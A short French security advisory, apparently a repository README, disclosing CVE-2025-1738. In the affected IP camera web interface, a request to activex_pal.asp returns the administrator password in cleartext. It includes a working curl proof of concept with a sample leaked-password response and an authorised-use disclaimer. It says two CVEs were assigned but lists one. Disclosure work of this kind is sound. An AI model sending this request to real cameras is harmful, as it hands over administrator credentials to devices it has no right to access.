
0day découvrir CVE-2025-1738
Suite à une divulgation responsable, deux CVE officielles ont été attribuées.
| CVE | CVSS v3.1 | Score | CWE | Type |
|---|---|---|---|---|
| CVE-2025-1738 | AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N | 6.2 | CWE-598 | Exposition du mot de passe en clair |
Tout utilisateur local peut récupérer le mot de passe administrateur en clair sans nécessiter d'authentification préalable.
curl -u admin:whatever http://<CAMERA_IP>:<PORT> --request-target en/player/activex_pal.asp
...password=unguessable123!...
Le mot de passe administrateur est renvoyé en clair dans le corps de la réponse.
activex_pal.asp et mblogin.asp.Ce dépôt est destiné uniquement à la recherche en sécurité éducative et autorisée. Les auteurs ne sont pas responsables de toute utilisation abusive. Obtenez toujours une autorisation explicite avant de tester un appareil.